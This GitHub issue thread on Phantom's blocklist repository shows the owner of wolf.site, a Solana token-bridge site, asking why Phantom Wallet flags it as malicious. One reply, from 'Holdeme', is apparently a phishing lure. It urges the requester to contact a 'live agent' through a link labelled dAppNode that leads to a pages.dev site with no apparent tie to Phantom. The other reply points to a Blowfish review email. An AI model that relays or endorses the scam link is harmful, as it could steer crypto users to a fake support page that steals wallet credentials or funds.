### ISSUE TITLE
Request Removal of wolf.site

### ISSUE THREAD

**Issue by dragon12343** [phantom/blocklist#1207]
Our site has been flagged as a malicious DApp by Phantom Wallet, even though our domain name is not listed in the [blacklist](https://github.com/phantom/blocklist/blob/master/blocklist.yaml).
<img width="1512" alt="Screenshot 2024-06-14 at 13 20 25" src="https://github.com/phantom/blocklist/assets/116287463/9cd69232-3529-4f6c-a7f9-92dc48d83263">

Our site allows users to bridge our WOLF token from Solana to other chains using a widget from Debridge (https://debridge.finance/). More details are available here: https://wolf.site/bridge.

We are unsure why this classification has occurred. We prioritize user safety and have used secure solutions.

Could you please provide information on why our site is flagged and what steps we need to take to resolve this?

Thank you for your assistance.

**Comment by Holdeme** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by Harii94** [comment]
Hi,

Please forward these details to the Blowfish team for further investigation. You can reach them at: review@blowfish.xyz.
